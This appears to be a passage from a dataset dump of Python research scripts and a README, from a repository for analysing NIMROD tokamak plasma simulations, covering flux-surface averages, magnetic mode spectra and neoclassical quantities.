self.pe=interp1d(dvar[1,:iend], yvar[4,:iend], kind='cubic')(self.rhon)\n self.ti=interp1d(dvar[1,:iend], yvar[5,:iend], kind='cubic')(self.rhon)\n self.te=interp1d(dvar[1,:iend], yvar[6,:iend], kind='cubic')(self.rhon)\n self.jpar=interp1d(dvar[1,:iend], yvar[7,:iend], kind='cubic')(self.rhon)\n self.f=interp1d(dvar[1,:iend], yvar[8,:iend], kind='cubic')(self.rhon)\n self.invr2=interp1d(dvar[1,:iend], yvar[9,:iend], kind='cubic')(self.rhon)\n" }, { "alpha_fraction": 0.6527494788169861, "alphanum_fraction": 0.7622199654579163, "avg_line_length": 36.075469970703125, "blob_id": "c16e7c3180974626ccf535eac11eeb8e33be8cb6", "content_id": "d60b3fa9bdd387211af66cb8168f04bf4240a2b7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1964, "license_type": "no_license", "max_line_length": 81, "num_lines": 53, "path": "/trip2Nim/tripToNim.py", "repo_name": "echowell/nimrodscripts", "src_encoding": "UTF-8", "text": "#!/usr/local/bin/python3\n''' This script reads the external magnetic fields from trip3D output files\n and converts that data to a formate readible by NIMROD '''\n\nimport sys\nsys.path.insert(0, \"./\")\nimport os\nimport tripClass as tc\n\nhomeDir = os.environ['HOME']\n\nreadDirectory = homeDir + \"/SCRATCH/166439/03300_2_equilbria/19091201_probeg/\"\n\n#writeDirectory = homeDir + \"/SCRATCH/testingjunk/\"\n#writeDirectory = homeDir + \"/SCRATCH/166439/03300_vac_eq/normal_rmp/\"\nwriteDirectory = homeDir + \"/SCRATCH/166439/03300_2_equilbria/19091201_probeg/\"\nreadDirectory = homeDir + \"/SCRATCH/166439/03300_2_equilbria/19100401_probe_gb/\"\nwriteDirectory = homeDir + \"/SCRATCH/166439/03300_2_equilbria/19100401_probe_gb/\"\n\nreadDirectory = homeDir + \"/SCRATCH/KSTAR/19118_2800ms/22032403_probeg/\"\nwriteDirectory = homeDir + \"/SCRATCH/KSTAR/19118_2800ms/22032403_rmp_v1/\"\n\nreadDirectory = homeDir + \"/SCRATCH/KSTAR/19118_2950_C1wall/22052401_brmp/\"\nwriteDirectory = homeDir + \"/SCRATCH/KSTAR/19118_2950_C1wall/22052401_brmp/\"\n\nreadDirectory = homeDir + \"/SCRATCH/KSTAR/19118_2950_C1wall/22062201_probeg/\"\nwriteDirectory = homeDir + \"/SCRATCH/KSTAR/19118_2950_C1wall/22062201_brmp/\"\n\nshotNumber = \"166439\"\ntimeSlice = \"03300\"\n\nrzFileSuffix = \"probe.points.rz.in\"\naFileSuffix = \"probe_ga.out\"\nbFileSuffix = \"probe_gb.out\"\n\nnimrodRmpFile = \"brmpn\"\nnimrodRmpSuffix = \".dat\"\n\nrzProbeFile = readDirectory + shotNumber + \".\" + timeSlice + \".\" + rzFileSuffix\naProbeFile = readDirectory + shotNumber + \".\" + timeSlice + \".\" + aFileSuffix\nbProbeFile = readDirectory + shotNumber + \".\" + timeSlice + \".\" + bFileSuffix\n\nrzProbeFile = readDirectory + rzFileSuffix\naProbeFile = readDirectory + aFileSuffix\nbProbeFile = readDirectory + bFileSuffix\n\nindexShift=0 #was 5\ncomplexCon = True\n\ntripData = tc.TripClass(rzProbeFile,aProbeFile,bProbeFile,indexShift,complexCon)\ntripData.processBFile()\nprint(tripData.brPhase[0,:])\ntripData.writeNimrodBext(writeDirectory,nimrodRmpFile,nimrodRmpSuffix)" }, { "alpha_fraction": 0.5698172450065613, "alphanum_fraction": 0.600371241569519, "avg_line_length": 31.88262939453125, "blob_id": "a426f30315e353359dbbe07dd3877b75c12ed62d", "content_id": "6fb16dc9c7e7e2aaf5da6b5af4b7c5621e04b7d2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 14008, "license_type": "no_license", "max_line_length": 90, "num_lines": 426, "path": "/ntmscripts/ntm_step.py", "repo_name": "echowell/nimrodscripts", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\n#\n#profiles is a class for calculating 1D profiles\n# using the flux surface integration\n#\n#\nimport f90nml\nimport eval_comp_nimrod as ceval\n#from field_class import *\nimport comp_fsa as cfsa\nimport matplotlib.pyplot as plt\nimport matplotlib.colors as mcolors\nfrom scipy.interpolate import interp1d,splev,UnivariateSpline,griddata\nimport os\nimport h5py\nimport sys\nimport numpy as np\nimport pickle\n\nclass ntmstep:\n def __init__(self,dumpfile,nimrodin):\n #start with dump file and nimrod.in info\n self.dumpfile=dumpfile\n self.nimrodin=nimrodin\n self.time=None\n self.step=None\n # next include info on how fsa's were performed\n self.mmax=None\n self.ifour=[]\n self.nfour=None\n self.setprofiles=False\n #finally end with the profiles\n self.psin=np.empty([1])\n self.psi=np.empty([1])\n self.rhon=np.empty([1])\n self.q=np.empty([1])\n self.qpsi=np.empty([1])\n self.vprime=np.empty([1])\n self.bmn=np.empty([1])\n self.bcmn=np.empty([1])\n self.bsmn=np.empty([1])\n def dump(self,file):\n pickle.dump(self.dumpfile,file)\n pickle.dump(self.nimrodin,file)\n pickle.dump(self.time,file)\n pickle.dump(self.step,file)\n # next include info on how fsa's were performed\n pickle.dump(self.mmax,file)\n pickle.dump(self.ifour,file)\n pickle.dump(self.nfour,file)\n pickle.dump(self.setprofiles,file)\n #finally end with the profiles\n if self.setprofiles==True:\n pickle.dump(self.psin,file)\n pickle.dump(self.psi,file)\n pickle.dump(self.rhon,file)\n pickle.dump(self.q,file)\n pickle.dump(self.vprime,file)\n pickle.dump(self.bmn,file)\n pickle.dump(self.bcmn,file)\n pickle.dump(self.bsmn,file)\n def load(self,file):\n self.dumpfile=pickle.load(file)\n self.nimrodin=pickle.load(file)\n self.time=pickle.load(file)\n self.step=pickle.load(file)\n # next include info on how fsa's were performed\n self.mmax=pickle.load(file)\n self.ifour=pickle.load(file)\n self.nfour=pickle.load(file)\n self.setprofiles=pickle.load(file)\n #finally end with the profiles\n if self.setprofiles==True:\n self.psin=pickle.load(file)\n self.psi=pickle.load(file)\n self.rhon=pickle.load(file)\n self.q=pickle.load(file)\n self.vprime=pickle.load(file)\n self.bmn=pickle.load(file)\n self.bcmn=pickle.load(file)\n self.bsmn=pickle.load(file)\n\n def get_m_index(self,m):\n '''Return the index for the given m\n Return None if m is out of range'''\n if self.mmax==None:\n write(\"mmax has not be set in get_m_index\")\n raise\n else:\n if m>self.mmax:\n return None\n elif m<-1*self.mmax:\n return None\n else:\n return m+self.mmax\n def dummy_fsa(self,rzc,y,dy,evalnimrod,flag,fargs):\n '''\n Dummy integrand for complex fsa, this is used to get v' and q\n without running a true fsa\n Flux surface averge quantities (f/bdgrth where y[2]=1/bdgrth)\n dy(0)=dl/deta or d eta/dl\n dy(1)=dr/deta or dr/dl\n dy(2)=1/bdgth :v'\n dy(3)=dq: q\n '''\n dy[4]=1.0\n return dy\n\n def surfmn_int(self,rzc,y,dy,evalnimrod,flag,fargs):\n '''\n Integrand for fluxsurface integration\n Flux surface averge quantities (f/bdgrth where y[2]=1/bdgrth)\n dy(0)=dl/deta or d eta/dl\n dy(1)=dr/deta or dr/dl\n dy(2)=1/bdgth\n dy(3)=dq\n dy(4)=dtheta\n '''\n\n #self.mmax=fargs.get(\"mmax\")\n\n\n b0=np.array(cfsa.get_b0(evalnimrod,rzc,flag))\n b = evalnimrod.eval_field('b', rzc, dmode=0)\n\n\n rr =rzc[0]\n q=self.qpsi(fargs.get('psi'))\n jac=rr*q/b0[2]\n dy[4]=dy[2]/jac #dtheta\n for ii, im in enumerate(self.ifour):\n oset = ii * (4*self.mmax+1)\n reb=np.real(b[:,im+1])\n imb=np.imag(b[:,im+1])\n rBePsi=rr*(reb[1]*b0[0]-reb[0]*b0[1])\n iBePsi=rr*(imb[1]*b0[0]-imb[0]*b0[1])\n for im in range(self.mmax):\n nmth=-(self.mmax-im)*y[4] #negative m theta\n pmth=(im+1)*y[4] #positive m theta\n dy[5+im+oset]=(rBePsi*np.cos(nmth)-iBePsi*np.sin(nmth))*dy[2]\n dy[6+self.mmax+im+oset]=(rBePsi*np.cos(pmth)-iBePsi*np.sin(pmth))*dy[2]\n dy[6+2*self.mmax+im+oset]=-(rBePsi*np.sin(nmth)+iBePsi*np.cos(nmth))*dy[2]\n dy[6+3*self.mmax+im+oset]=-(rBePsi*np.sin(pmth)+iBePsi*np.cos(pmth))*dy[2]\n dy[5+self.mmax+oset]=rBePsi*dy[2]\n return dy\n\n\n def get_rho_q(self,q):\n try:\n return interp1d(self.q,self.rhon, kind='cubic',fill_value=\"extrapolate\")(q)\n except:\n print(f\"The safety factor {q} is not it the domain\")\n raise\n\n def get_field_rho(self,field,rhon):\n try:\n return interp1d(self.rhon,field, kind='cubic')(rhon)\n except:\n print(f\"Problem evaluitng field at rhon={rhon}\")\n raise\n\n def calculate(self,rzo=None,rzx=None,nsurf=150,eqflag=0,fargs={},**kwargs):\n mi=kwargs.get(\"mi\",3.3435860e-27)\n qe=kwargs.get(\"qe\",1.609e-19)\n self.ifour=fargs.get(\"ifour\")\n self.mmax=fargs['mmax']\n self.nfour=len(fargs['ifour'])\n self.setprofiles=True\n\n #first call to fsa is to calcualte q\n cevalnimrod=ceval.EvalCompNimrod(self.dumpfile,fieldlist='nvptbj')\n dvar, yvar, contours = cfsa.FSA(cevalnimrod, rzo, self.dummy_fsa, 1, \\\n nsurf=nsurf,depvar='eta',dpow=0.5,rzx=rzx,flag=eqflag,normalize=True, \\\n fargs=fargs)\n\n iend=-1\n while np.isnan(yvar[:,iend]).any():\n iend -= 1\n iend += yvar.shape[1]+1\n #unevaluated interpoate\n self.qpsi=interp1d(dvar[2,:iend], dvar[7,:iend], kind='cubic')\n\n #second call to fsa is to calcualte b_ms ans psi_mn\n neq=1+self.nfour*(4*self.mmax+1)\n dvar,yvar,contours = cfsa.FSA(cevalnimrod, rzo, self.surfmn_int, neq, \\\n nsurf=nsurf,depvar='eta', dpow=0.5,rzx=rzx,flag=eqflag,normalize=False,\\\n fargs=fargs)\n\n iend=-1\n while np.isnan(yvar[:,iend]).any():\n iend -= 1\n iend += yvar.shape[1]+1\n\n bmn=np.zeros([self.nfour,2*self.mmax+1,iend])\n bcmn=np.zeros([self.nfour,2*self.mmax+1,iend])\n bsmn=np.zeros([self.nfour,2*self.mmax+1,iend])\n for ii in range(self.nfour):\n oset = ii * (4*self.mmax+1)\n bcmn[ii,:,:]= yvar[1+oset:2*self.mmax+2+oset,:iend]*(np.pi*2.0)\n bsmn[ii,0:self.mmax,:]=\\\n yvar[2+2*self.mmax+oset:2+3*self.mmax+oset,:iend]*(np.pi*2.0)\n bsmn[ii,self.mmax+1:2*self.mmax+1,:]=\\\n yvar[2+3*self.mmax+oset:2+4*self.mmax+oset,:iend]*(np.pi*2.0)\n bmn=np.sqrt(np.square(bcmn)+np.square(bsmn))\n rhomin=np.min(dvar[1,:iend])\n rhomax=np.max(dvar[1,:iend])\n self.rhon = np.linspace(rhomin,rhomax,200,endpoint=True)\n #dvars\n self.psin=interp1d(dvar[1,:iend], dvar[0,:iend], kind='cubic')(self.rhon)\n self.psi=interp1d(dvar[1,:iend], dvar[2,:iend], kind='cubic')(self.rhon)\n self.vprime=np.pi*2*interp1d(dvar[1,:iend], dvar[6,:iend], kind='cubic')(self.rhon)\n self.q=interp1d(dvar[1,:iend], dvar[7,:iend], kind='cubic')(self.rhon)\n\n self.bcmn=interp1d(dvar[1,:iend],bcmn, kind='cubic')(self.rhon)\n self.bsmn=interp1d(dvar[1,:iend],bsmn, kind='cubic')(self.rhon)\n self.bmn =interp1d(dvar[1,:iend],bmn , kind='cubic')(self.rhon)\n\n def get_b0(self,eval_nimrod,rzn,flag,abort=False):\n \"\"\"\n Find b at a given point\n :param eval_nimrod: eval_nimrod class instance\n :param rzn: initial guess for poloidal field null\n :param flag: if 0 only use eq, if 1 add n=0 to eq\n :param abort: raise an exception if true and can't find b\n \"\"\"\n b = eval_nimrod.eval_field('b', rzn, dmode=0)\n b0=np.real(b[:,0])\n if flag==1:\n b0+=np.real(b[:,1])\n if (abort and np.isnan(b0).any()):\n print(b)\n raise Exception('FSA_find_pf_null: Hit wall')\n return b0\n\n def find_pf_null(self,eval_nimrod, rzn, flag=0):\n \"\"\"\n Find a poloidal field null\n :param eval_nimrod: eval_nimrod class instance\n :param rzn: initial guess for poloidal field null\n :param flag: if 0 only use eq, if 1 add n=0 to eq\n \"\"\"\n rzn = np.array(rzn)\n maxsteps=1000\n it=0\n rtol=1.e-8\n drz0=0.125*rzn[0]\n while True:\n b = self.get_b0(eval_nimrod,rzn,flag,abort=False)\n norm0=np.sqrt(b[0]**2+b[1]**2)\n rvn=-rzn[0]*b[1]/norm0\n zvn= rzn[0]*b[0]/norm0\n drz=drz0*(1.0-float(it)/maxsteps)+rtol*rzn[0]\n while True:\n rr=rzn[0]+rvn*drz\n zz=rzn[1]+zvn*drz\n rzng=np.array([rr, zz, 0.0])\n b = self.get_b0(eval_nimrod,rzng,flag,abort=False)\n if not np.isnan(b).any():\n norm=np.sqrt(b[0]**2+b[1]**2)\n if (norm < norm0):\n rzn[:]=rzng[:]\n break\n rr=rzn[0]-rvn*drz\n zz=rzn[1]-zvn*drz\n rzng=np.array([rr, zz, 0.0])\n b = self.get_b0(eval_nimrod,rzng,flag,abort=False)\n if not np.isnan(b).any():\n norm=np.sqrt(b[0]**2+b[1]**2)\n if (norm < norm0):\n rzn[:]=rzng[:]\n break\n drz=drz/2.0\n if (drz/rzn[0] < rtol):\n return rzn # done\n it=it+1\n if it>=maxsteps:\n raise Exception('FSA find_pf_null: No convergence')\n return\n\n def plot(self,pargs={}):\n for im,imode in enumerate(self.ifour):\n self.plot_radial(im,imode,pargs)\n self.plot_surfmn(im,imode,pargs)\n\n def plot_radial(self,ii,imode,pargs={}):\n fig = plt.figure(figsize=(10,8))\n ax=fig.add_subplot(111)\n title=f\"$\\psi$(n={int(imode)}) at {self.time*1000:.3f}ms\"\n ylabel=f\"$\\psi_m$ [mWb]\"\n colorlist = list(mcolors.TABLEAU_COLORS)\n xlabel=r'$\\rho_N$'\n fontsize=18\n if imode==1:\n mlist=range(-4,1)\n elif imode==2:\n mlist=range(-6,-1)\n else:\n mstart=-2*imode\n mlist=range(mstart,mstart+imode+1)\n if 'mlists' in pargs:\n if ii<len(pargs['mlists'][ii]):\n mlist=pargs['mlists'][ii]\n\n for im,this_m in enumerate(mlist):\n this_i = self.get_m_index(this_m)\n if this_i!= None:\n mlbl = \"m = \" + str(this_m)\n tc=colorlist[im%len(colorlist)]\n ax.plot(self.rhon,self.bmn[ii,this_i,:]*1000, color=tc, label=mlbl)\n try:\n qlist=pargs['qlists'][ii]\n except:\n if imode==1:\n qlist=[-4,-3,-2]\n elif imode==2:\n qlist=[-4,-3,-2.5,-2,-1.5]\n elif imode==3:\n qlist=[-3,-2.33, -2,-1.67,-1.33]\n elif imode==4:\n qlist=[-3,-2,-1.75,-1.5,-1.25]\n elif imode==5:\n qlist=[-3,-2,-1.8,-1.6,-1.4,-1.2]\n else:\n qlist=[-4,-3,-2]\n\n for iq,qq in enumerate(qlist):\n try:\n irho = self.get_rho_q(qq)\n qlbl = f\"q = {qq:.2f}\"\n tc=colorlist[iq]\n ax.axvline(irho,ls=':',color=tc, label=qlbl)\n except:\n print(f\"q={qq:.2f} is not in the domain\")\n ax.axhline(0,ls='-',c='k')\n ax.legend(loc=0,frameon=True,fontsize=fontsize)\n plt.title(title,fontsize=fontsize)\n plt.xlabel(xlabel,fontsize=fontsize)\n plt.ylabel(ylabel,fontsize=fontsize)\n plt.tight_layout()\n plt.show()\n\n def plot_surfmn(self,im,imode,surfmn,pargs={}):\n fig = plt.figure(figsize=(10,8))\n ax=fig.add_subplot(111)\n # Set titles and labels\n title=f\"$\\psi$(n={int(imode)}) at {self.time*1000:.3f}ms\"\n # set contour levels, i could generalize this further if needed\n levels=301\n vmax=np.amax(self.bmn[im,:,:])*1000\n levels=np.linspace(0,vmax,301)\n cbar_ticks=np.linspace(0,vmax,11)\n # Update plot based on keys in kwargs\n xlabel=\"Poloidal Mode Number m\"\n fontsize=18\n # set up mrange()\n qmin=np.amin(self.q)\n qmax=np.amax(self.q)\n mrange=np.linspace(qmin,qmax)\n #create the surfmn plot\n plt.set_cmap('nipy_spectral')\n m=range(-self.mmax,self.mmax+1)\n mv, rv = np.meshgrid(m, self.rhon, sparse=False, indexing='ij')\n conf=plt.contourf(mv,rv,np.clip(self.bmn[im,:,:]*1000,0,None),levels=levels,vmax=vmax)\n plt.plot(imode*mrange,self.get_rho_q(mrange),c='w')\n plt.title(title,fontsize=fontsize)\n plt.ylabel(r'$\\rho_N$',fontsize=fontsize)\n plt.xlabel(xlabel,fontsize=fontsize)\n cbar=fig.colorbar(conf,ticks=cbar_ticks)\n plt.xlim(-self.mmax,self.mmax)\n plt.show()\n\n def get_dumptime(self):\n ''' Open the hdf5 dumpfile read the dump time and dumpstep\n '''\n with h5py.File(self.dumpfile, 'r') as h5file:\n try:\n self.time=h5file[\"dumpTime\"].attrs['vsTime']\n self.step=int(h5file[\"dumpTime\"].attrs['vsStep'])\n except:\n print(f\"Error reading time or step in {self.dumpfile}\")\n raise\n\n def plot_scalar(self,rr,zz,field):\n fig = plt.figure(figsize=(10,8))\n ax=fig.add_subplot(111)\n plt.set_cmap('nipy_spectral')\n conf=plt.contourf(rr,zz,field,corner_mask=False)\n plt.show()\n\n def get_domain(self):\n flag=1\n rmin=1.15\n rmax=2.3\n zmin=-1.25\n zmax=1.10\n npts=30\n nsteps=20\n lastr=np.nan\n cevalnimrod=ceval.EvalCompNimrod(self.dumpfile,fieldlist='nb')\n rzn=np.array([1.76897216, -0.01890963, 0. ])\n print(rzn)\n rzo=self.find_pf_null(cevalnimrod,rzn ,1)\n print(rzo)\n grid=np.meshgrid(np.linspace(rmin,rmax,npts),np.linspace(zmin,zmax,npts))\n grid=np.array(grid)\n print(grid.shape)\n nn=np.zeros([grid.shape[1],grid.shape[2],cevalnimrod.nmodes_peq,4],dtype=np.complex64)\n first=True\n for ir in range(grid.shape[1]):\n for iz in range(grid.shape[2]):\n rr=grid[0,ir,iz]\n zz=grid[1,ir,iz]\n if rr !=lastr:\n for ii in range(nsteps,0,-1):\n trr=rzo[0]+(rr-rzo[0])*(1.0-(ii/np.real(nsteps))**3)\n tzz=rzo[1]+(zz-rzo[1])*(1.0-(ii/np.real(nsteps))**3)\n trzp=np.array([trr,tzz,0.0])\n temp=cevalnimrod.eval_field('n', trzp, dmode=0)\n rzp=np.array([rr,zz,0.0])\n nn[ir,iz,:,:]=cevalnimrod.eval_field('n', rzp, dmode=1)\n lastr=rr\n ngrid =np.ma.masked_invalid(nn)\n print(nn)\n print(grid.shape,ngrid.shape)\n print((1,)+(3,4))\n self.plot_scalar(grid[0,:,:], grid[1,:,:],np.real(ngrid[:,:,3,0]))\n" }, { "alpha_fraction": 0.6158192157745361, "alphanum_fraction": 0.6232344508171082, "avg_line_length": 31.55172348022461, "blob_id": "e4437d46a3ff450490deb8a0a2817c89e5500ada", "content_id": "d74ac300b0d702dd7d7c326923ebabb495c3ce3c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2832, "license_type": "no_license", "max_line_length": 88, "num_lines": 87, "path": "/hocradic/hcRunnerFsa.py", "repo_name": "echowell/nimrodscripts", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\n#\n#\nimport os\nimport h5py\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport argparse\nimport pickle\nimport glob\nfrom shutil import copy2\nimport hcStepFsa as step\nimport nim_timer as nimtime\nimport matplotlib.colors as mcolors\n\n\ndef hcrunner(file_name=None,\n pickle_data=False,\n read_pickle=False,\n args={}):\n\n if not os.path.isfile(file_name):\n print(f\"File {file_name} not found\")\n raise IOError\n\n dump_pre=[\"dumpgll\",\"dump\"]\n dump_suf=[\"h5\"]\n pickle_suf=[\"pickle\"]\n pickle_pre=[\"fsapower\"]\n nimrodin=\"nimrod.in\"\n pre=file_name.split('.')[0]\n if pre in dump_pre:\n print(f\"Performing hc analysis from dump file\")\n # check for nimrod.in and hdf5 format\n if not os.path.isfile(nimrodin):\n print(f\"nimrod.in not found\")\n raise IOError\n if not file_name.split('.')[-1] in dump_suf:\n print(f\"dump file is not hdf5 format\")\n raise IOError\n\n hc=step.hcstepfsa(file_name,nimrodin,args['lphi'])\n hc.get_dumptime()\n hc.calculate_power_fsa(nsurf=args['npts'],**args)\n# hc.analyze_power(npts=args['npts'],plot=True)\n# hc.analyze_power_adv(npts=args['npts'],plot=True)\n# hc.print_integrals()\n nimtime.timer.print_times()\n print(hc.step, hc.time)\n\n #pickle data here\n if args['pickle']:\n pfile=pickle_pre[0]+'.'+str(hc.step).zfill(5)+'.'+pickle_suf[0]\n print(f\"writing file {pfile}\")\n with open(pfile,'wb') as file:\n hc.dump(file)\n elif pre in pickle_pre:\n print(\"pickle_pre\")\n hc=step.hcstepfsa(None,None,None)\n hc.load(file_name)\n print(f\"Time: {hc.time}\" )\n # hc.print_integrals()\n else:\n print(f\"File {file_name} is not a recognized file type\")\n raise IOError\n\n #plot data here\n if args['plot']:\n hc.interpolate_fsa(radial='rhon',npts=200,fsa=False)\n hc.default_plot()\n\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description='Ho-Cradick FSA runner.')\n parser.add_argument('file',help='file name')\n parser.add_argument('--plot', action='store_true',help='shows plots')\n parser.add_argument('--pickle', action='store_true',help='pickle data')\n parser.add_argument('--npts', '-n', type=int, default=100,help='number of surfaces')\n parser.add_argument('--lphi', '-l', type=int, default=5, help='lphi')\n parser.add_argument('--nmax', type=int, default=5, help='namx')\n parser.add_argument('--dpow', '-d', type=float, default=0.5, help='dpow')\n parser.add_argument('--read', '-r', action='store_true',help='read pickled data')\n args = vars(parser.parse_args())\n print(args)\n hcrunner(file_name=args['file'],args=args)#\\\n #pickle_data=args['pickle'],read_pickle=args['read'],args=args)\n" }, { "alpha_fraction": 0.7301037907600403, "alphanum_fraction": 0.7508650422096252, "avg_line_length": 47, "blob_id": "fda6b51b65a7f4fb0305a4287953d0d76e4f36f9", "content_id": "db08f16c7192c18d94c7bd4a9103b2f2df26bb88", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 289, "license_type": "no_license", "max_line_length": 104, "num_lines": 6, "path": "/bilderScripts/README.md", "repo_name": "echowell/nimrodscripts", "src_encoding": "UTF-8", "text": "## bilderScripts\nThese are scripts that I use for building NIMROD on my macs when using bilder\n\n### Files\n - **darwin.gcc820:** my hacked machine file for building nimrod with gcc820\n - **run_bilder.sh:** a simple script that evokes bilder from the command line with options that I like.\n " }, { "alpha_fraction": 0.47154998779296875, "alphanum_fraction": 0.5227112770080566, "avg_line_length": 37.886314392089844, "blob_id": "54b13aab370f002a0e337956c4135e758c734368", "content_id": "8363060b2339c4e2869d6cb74541e97ec0fb77a7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 18471, "license_type": "no_license", "max_line_length": 143, "num_lines": 475, "path": "/random/muPlots_rev.py", "repo_name": "echowell/nimrodscripts", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\n\nfrom plot_nimrod import PlotNimrod as pn\nimport f90nml\nimport numpy as np\nfrom eval_nimrod import *\nfrom field_class import *\nfrom fsa import *\nimport matplotlib.pyplot as plt\nfrom scipy.interpolate import interp1d,splev,UnivariateSpline\nimport os\nimport argparse\n\ndef readRaw(rawFile):\n datadict={}\n with open(rawFile, 'r') as f:\n while True:\n dataname = f.readline()\n if not dataname:\n break\n dataname = dataname.split()\n datalen = int(dataname[0])\n dataname = dataname[2]\n npdata=np.zeros((3,datalen),np.float)\n for line in range(datalen):\n datastr=f.readline().split()\n npdata[0][line]=float(datastr[0])\n npdata[1][line]=float(datastr[1])\n npdata[2][line]=float(datastr[2])\n datadict[dataname]=npdata\n return datadict\n\ndef basefsa(rzc, y, dy, eval_nimrod, fdict):\n '''\n Flux surface averge quantities (f/bdgrth where y[2]=1/bdgrth)\n Set neq to number of outputs in FSA call\n and fill dy[4:4+neq]\n '''\n isurf=fdict.get('isurf')\n bextrema=fdict['bextrema']\n bigr=fdict['bigr']\n n = eval_nimrod.eval_field('n', rzc, dmode=0, eq=2)\n dy[4] = n[0]*dy[2] # ne\n dy[5] = dy[4] # nd #### n is not a vector for me\n dy[6] = 0.\n ti = eval_nimrod.eval_field('ti', rzc, dmode=0, eq=2)\n dy[7] = ti[0]*dy[2] # ti\n te = eval_nimrod.eval_field('te', rzc, dmode=0, eq=2)\n dy[8] = te[0]*dy[2] # te\n bf = eval_nimrod.eval_field('b', rzc, dmode=1, eq=2)\n B = Vector(bf, rzc, torgeom=True, dmod=1)\n bsq = B.dot(B,dmod=0).data\n dy[9] = bsq*dy[2] # B**2\n dy[10] = (B.hat(dmod=0).dot(grad(B.mag())).data)**2*dy[2] # (b.grad(|B|))**2\n dy[11] = rzc[0]*bf[2]*dy[2] # R B_Phi\n bmag = np.sqrt(bsq)\n bextrema[0,isurf] = min(bextrema[0,isurf], bmag)\n bextrema[1,isurf] = max(bextrema[1,isurf], bmag)\n bigr[isurf] = max(bigr[isurf], rzc[0])\n vf = eval_nimrod.eval_field('v', rzc, dmode=0, eq=2)\n dy[12] = vf[2]*dy[2]/rzc[0] # omega\n dy[13] = (vf[0]*bf[0]+vf[1]*bf[1])*dy[2]/np.sqrt(bf[0]*bf[0]+bf[1]*bf[1]) # Kpol\n return dy\n\ndef trapfsa(rzc, y, dy, eval_nimrod,fdict):\n '''\n Flux surface averge quantities (f/bdgrth where y[2]=1/bdgrth)\n Set neq to number of outputs in FSA call\n and fill dy[4:4+neq]\n '''\n bf = eval_nimrod.eval_field('b', rzc, dmode=0, eq=2)\n B = Vector(bf, rzc, torgeom=True, dmod=0)\n bmag = B.mag().data\n bave=fdict['bave']\n nlam=fdict['nlam']\n lam=fdict['lam']\n rzo=fdict['rzo_copy']\n dy[4:4+nlam] = np.sqrt(1.0 - lam[:]*bmag/bave)\n dy[4+nlam:4+2*nlam] = dy[2]/(dy[4:4+nlam])\n dy[4:4+nlam]*=dy[2] #note dy[4:4+nlam] is used in above calc\n dy[4+2*nlam] = dy[2]*bmag/bave\n dy[4+2*nlam+1] = dy[2]*np.sqrt((rzc[0]-rzo[0])**2+(rzc[1]-rzo[1])**2)\n return dy\n\n# load dump file\ndef neoclassical_calculator(dumpfile):\n dumpfile = 'dumpgll.00000.h5'\n nml = f90nml.read('nimrod.in')\n gmt = nml['grid_input']['geom']\n if gmt == 'tor':\n gmt=True\n else:\n gmt=False\n eval_nimrod = EvalNimrod(dumpfile, fieldlist='nvptbj') #, (e not in dumpfile coord='xyz')\n\n\n rzo = find_pf_null(eval_nimrod, [1.7, -0.2, 0])\n\n md=3.3435860e-27\n me=9.1093837015e-31\n #%zc=6\n #%mc=1.9944235e-26\n echrg=1.609e-19\n kboltz=echrg\n kb=1.609e-19\n eps0=8.85418782e-12\n #%\n nsurf = 150 # FSA surfaces\n bextrema = np.zeros([2,nsurf])\n bextrema[0,:] = np.inf # min\n bextrema[1,:] = -np.inf # max\n bigr = np.zeros([nsurf])\n bigr[:] = -np.inf # max\n #%\n\n################################################################################\n# Calculate basic fsa quantitites\n################################################################################\n dpow=1.0\n fsafilename = 'fsa.npz'\n if os.path.exists(fsafilename):\n fsaDict = np.load(fsafilename)\n dvar = fsaDict['arr_0']\n yvars = fsaDict['arr_1']\n contours = fsaDict['arr_2']\n bextrema = fsaDict['arr_3']\n bigr = fsaDict['arr_4']\n else:\n# dvar, yvars, contours = FSA(eval_nimrod, rzo, basefsa, 10, nsurf=nsurf, \\\n# depvar='eta', dpow=dpow, rzx=[1.3, -1.14, 0],\n# bextrema=bextrema, bigr=bigr)\n dvar, yvars, contours = FSA(eval_nimrod, rzo, basefsa, 10, nsurf=nsurf, \\\n depvar='eta', dpow=dpow,\n bextrema=bextrema, bigr=bigr)\n fsaArr = [dvar, yvars, contours, bextrema, bigr]\n np.savez(fsafilename,*fsaArr)\n\n # Determine where the FSA failed\n iend=-1\n while np.isnan(yvars[:,iend]).any():\n iend -= 1\n iend += yvars.shape[1]+1\n\n################################################################################\n# Calcualte trapped and passing fractions\n################################################################################\n trapfilename = 'trap.npz'\n if os.path.exists(trapfilename):\n trapDict = np.load(trapfilename)\n f_pass = trapDict['arr_0']\n eps = trapDict['arr_1']\n else:\n # Arrays for passing/trapped fractions\n # ind 0 - Helander and Sigmar Eq. 11.24\n # f_t = 1 - (3/4)*int_0^(Bave/Bmax) dlambda lambda/<SQRT(1-lambda*B/Bave)>\n # ind 1 - Lin-Liu and Miller (1995)\n # f_tl = 1 - (3/4)*int_0^(Bave/Bmax) dlambda lambda*<1/SQRT(1-lambda*B/Bave)>\n # ind 2 - f_tu from Lin-Liu and Miller (1995)\n # f_tu = 1 - (3/4)*int_0^(Bave/Bmax) dlambda lambda/SQRT(1-lambda*<B/Bave>)\n # int 3 - f_te from inverse aspect ratio as in B5\n # f_c ~ 1 - 1.46*sqrt(eps) + 0.46*eps*sqrt(eps)\n f_pass = np.zeros([4,iend])\n eps = np.zeros([iend])\n # integrate from 0 to bmax\n for ii in range(iend):\n nlam = 100\n lam, weights = np.polynomial.legendre.leggauss(nlam)\n bave = np.sqrt(yvars[5,ii]) # sqrt(<B^2>)\n lam += 1\n lam *= bave/(2.0*bextrema[1,ii])\n weights *= bave/(2.0*bextrema[1,ii])\n rzp = [contours[0,0,ii], contours[1,0,ii], 0]\n intgr, contour = FSA(eval_nimrod, rzo, trapfsa, 2*nlam+2, nsurf=1,\n depvar='eta', rzp=rzp, bave=bave, nlam=nlam,\n lam=lam, rzo_copy=rzo)\n f_pass[0,ii] = 